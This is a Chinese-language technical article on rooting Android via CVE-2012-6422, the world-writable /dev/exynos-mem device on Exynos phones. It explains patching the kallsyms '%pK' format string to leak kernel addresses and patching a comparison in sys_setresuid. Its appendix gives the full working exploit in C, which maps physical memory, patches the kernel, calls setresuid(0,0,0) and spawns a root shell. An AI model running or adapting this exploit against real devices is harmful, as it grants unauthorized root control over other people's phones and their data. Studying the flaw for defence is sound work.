Android內核sys_setresuid() Patch提權(CVE-2012-6422)
讓我們的Android ROOT,多一點套路。
一、簡單套路
CVE-2012-6422的漏洞利用代碼,展示了另一種提權方法。(見附錄)
這也是一個mmap驅動接口校驗導致映射任意內核地址的洞。將內核映射到用戶進程空間後,使用setresuid(0, 0, 0)進行提權。
其步驟如下:
- 利用漏洞,映射內核到調用者進程空間
- 搜索內核,查找“%pK %c %s\n”,並Patch成“%p %c %s\n”
- 搜索內核,查找sys_setresuid符號地址
- 搜索sys_setresuid代碼段,查找“0xe3500000” 並Patch為“0xe3500001”
- 用戶態調用setresuid()提權
- 將前面2處Patch恢復原貌
二、詳解
1)為什麽搜索“%pK %c %s\n”
我們獲得Linux的內核符號地址,一般首選讀取/proc/kallsyms,但由於kptr_restrict的引入(/proc/sys/kernel/kptr_restrict),讀到的內核符號地址一般是被抹掉的(0x00000000)。
查看內核實現,在執行$ cat /proc/kallsyms 時,對應內核代碼為s_show()函數:
527 static int s_show(struct seq_file *m, void *p) 528 { 529 struct kallsym_iter *iter = m->private; 530 531 /* Some debugging symbols have no name. Ignore them. */ 532 if (!iter->name[0]) 533 return 0; 534 535 if (iter->module_name[0]) { 536 char type; 537 538 /* 539 * Label it "global" if it is exported, 540 * "local" if not exported. 541 */ 542 type = iter->exported ? toupper(iter->type) : 543 tolower(iter->type); 544 seq_printf(m, "%pK %c %s\t[%s]\n", (void *)iter->value, 545 type, iter->name, iter->module_name); 546 } else 547 seq_printf(m, "%pK %c %s\n", (void *)iter->value, 548 iter->type, iter->name); 549 return 0; 550 }
我們在/proc/kallsyms中看到的3列值,是由下述代碼生成:
547 seq_printf(m, "%pK %c %s\n", (void *)iter->value,
548 iter->type, iter->name);
其中%pK格式符會根據kptr_restrict值,選擇是否顯示符號地址,默認kptr_restrict值一般為1,即隱藏符號地址。只需要將K替換為空格,即可繞過此限制。
2)為什麽要將sys_setresuid代碼的“0xe3500000” Patch為“0xe3500001”
我們知道,如果成功調用setresuid(0, 0, 0),則會獲得root權限,但成功執行此調用需要嚴格條件,具體描述下。
setresuid()被執行的條件有:
-
當前進程的euid是root
-
三個參數,每一個等於原來某個id中的一個
如果滿足以上條件的任意一個,setresuid()都可以正常調用並執行,將進程的ID設置成對應的ID。
但顯然,我們的提權程序不滿足上述任何一個條件,那怎麽辦呢。看代碼。
/*
* This function implements a generic ability to update ruid, euid,
* and suid. This allows you to implement the 4.4 compatible seteuid().
*/
asmlinkage long sys_setresuid(uid_t ruid, uid_t euid, uid_t suid)
{
int old_ruid = current->uid;
int old_euid = current->euid;
int old_suid = current->suid;
int retval;
retval = security_task_setuid(ruid, euid, suid, LSM_SETID_RES);
if (retval)
return retval;
if (!capable(CAP_SETUID)) {
if ((ruid != (uid_t) -1) && (ruid != current->uid) &&
(ruid != current->euid) && (ruid != current->suid))
return -EPERM;
if ((euid != (uid_t) -1) && (euid != current->uid) &&
(euid != current->euid) && (euid != current->suid))
return -EPERM;
if ((suid != (uid_t) -1) && (suid != current->uid) &&
(suid != current->euid) && (suid != current->suid))
return -EPERM;
}
if (ruid != (uid_t) -1) {
if (ruid != current->uid && set_user(ruid, euid != current->euid) < 0)
return -EAGAIN;
}
if (euid != (uid_t) -1) {
if (euid != current->euid)
{
current->mm->dumpable = 0;
wmb();
}
current->euid = euid;
}
current->fsuid = current->euid;
if (suid != (uid_t) -1)
current->suid = suid;
return security_task_post_setuid(old_ruid, old_euid, old_suid, LSM_SETID_RES);
}
sys_setresuid()的邏輯很簡單,首先調用 retval = security_task_setuid(ruid, euid, suid, LSM_SETID_RES); 設置實際用戶ID,有效用戶ID及保存的設置用戶ID,如果成功,直接返回retval。
setresuid()有個性質,英文名稱是all-or-nothing effect,意思是,如果setresuid()對某一個ID設置成功了,其他的失敗了,比如只改變了ruid,suid和euid都改失敗了,那麽程序會將ruid改回原來的值,即保證要麽三個ID都能成功修改,要麽三個都沒能修改成功。
我們只需要Patch掉下述代碼,使其返回成功。
if (retval)
return retval;
而其對應的ARM匯編為:
cmp r0, #0
對應字節碼為 0xE3500000,只需將其Patch成cmp r0, #1即可,即0xE3500001,所有進程的setresuid(0, 0, 0)都將成功執行,將當前進程提升到root權限。
ARM Opcodes查詢可通過:http://armconverter.com
三、附錄:CVE-2012-6422 exploit
/*
* exynos-mem device abuse by alephzain
*
* /dev/exynos-mem is present on GS3/GS2/GN2/MEIZU MX
*
* the device is R/W by all users :
* crw-rw-rw- 1 system graphics 1, 14 Dec 13 20:24 /dev/exynos-mem
*
*/
/*
* Abuse it for root shell
*/
#include <stdio.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <stdbool.h>
#define PAGE_OFFSET 0xC0000000
#define PHYS_OFFSET 0x40000000
int main(int argc, char **argv, char **env) {
int fd, i, m, index, result;
unsigned long *paddr = NULL;
unsigned long *tmp = NULL;
unsigned long *restore_ptr_fmt = NULL;
unsigned long *restore_ptr_setresuid = NULL;
unsigned long addr_sym;
int page_size = sysconf(_SC_PAGE_SIZE);
int length = page_size * page_size;
/* for root shell */
char *cmd[2];
cmd[0] = "/system/bin/sh";
cmd[1] = NULL;
/* /proc/kallsyms parsing */
FILE *kallsyms = NULL;
char line [512];
char *ptr;
char *str;
bool found = false;
/* open the door */
fd = open("/dev/exynos-mem", O_RDWR);
if (fd == -1) {
printf("[!] Error opening /dev/exynos-mem\n");
exit(1);
}
/* kernel reside at the start of physical memory, so take some Mb */
paddr = (unsigned long *)mmap(NULL, length, PROT_READ|PROT_WRITE, MAP_SHARED, fd, PHYS_OFFSET);
tmp = paddr;
if (paddr == MAP_FAILED) {
printf("[!] Error mmap: %s|%08X\n",strerror(errno), i);
exit(1);
}
/*
* search the format string "%pK %c %s\n" in memory
* and replace "%pK" by "%p" to force display kernel
* symbols pointer
*/
for(m = 0; m < length; m += 4) {
if(*(unsigned long *)tmp == 0x204b7025
&& *(unsigned long *)(tmp+1) == 0x25206325
&& *(unsigned long *)(tmp+2) == 0x00000a73 ) {
printf("[*] s_show->seq_printf format string found at: 0x%08X\n", PAGE_OFFSET + m);
restore_ptr_fmt = tmp;
*(unsigned long*)tmp = 0x20207025;
found = true;
break;
}
tmp++;
}
if (found == false) {
printf("[!] s_show->seq_printf format string not found\n");
exit(1);
}
found = false;
/* kallsyms now display symbols address */
kallsyms = fopen("/proc/kallsyms", "r");
if (kallsyms == NULL) {
printf("[!] kallsysms error: %s\n", strerror(errno));
exit(1);
}
/* parse /proc/kallsyms to find sys_setresuid address */
while((ptr = fgets(line, 512, kallsyms))) {
str = strtok(ptr, " ");
addr_sym = strtoul(str, NULL, 16);
index = 1;
while(str) {
str = strtok(NULL, " ");
index++;
if (index == 3) {
if (strncmp("sys_setresuid\n", str, 14) == 0) {
printf("[*] sys_setresuid found at 0x%08X\n",addr_sym);
found = true;
}
break;
}
}
if (found) {
tmp = paddr;
tmp += (addr_sym - PAGE_OFFSET) >> 2;
for(m = 0; m < 128; m += 4) {
if (*(unsigned long *)tmp == 0xe3500000) {
printf("[*] patching sys_setresuid at 0x%08X\n",addr_sym+m);
restore_ptr_setresuid = tmp;
*(unsigned long *)tmp = 0xe3500001;
break;
}
tmp++;
}
break;
}
}
fclose(kallsyms);
/* to be sure memory is updated */
usleep(100000);
/* ask for root */
result = setresuid(0, 0, 0);
/* restore memory */
*(unsigned long *)restore_ptr_fmt = 0x204b7025;
*(unsigned long *)restore_ptr_setresuid = 0xe3500000;
munmap(paddr, length);
close(fd);
if (result) {
printf("[!] set user root failed: %s\n", strerror(errno));
exit(1);
}
/* execute a root shell */
execve (cmd[0], cmd, env);
return 0;
}
Android內核sys_setresuid() Patch提權(CVE-2012-6422)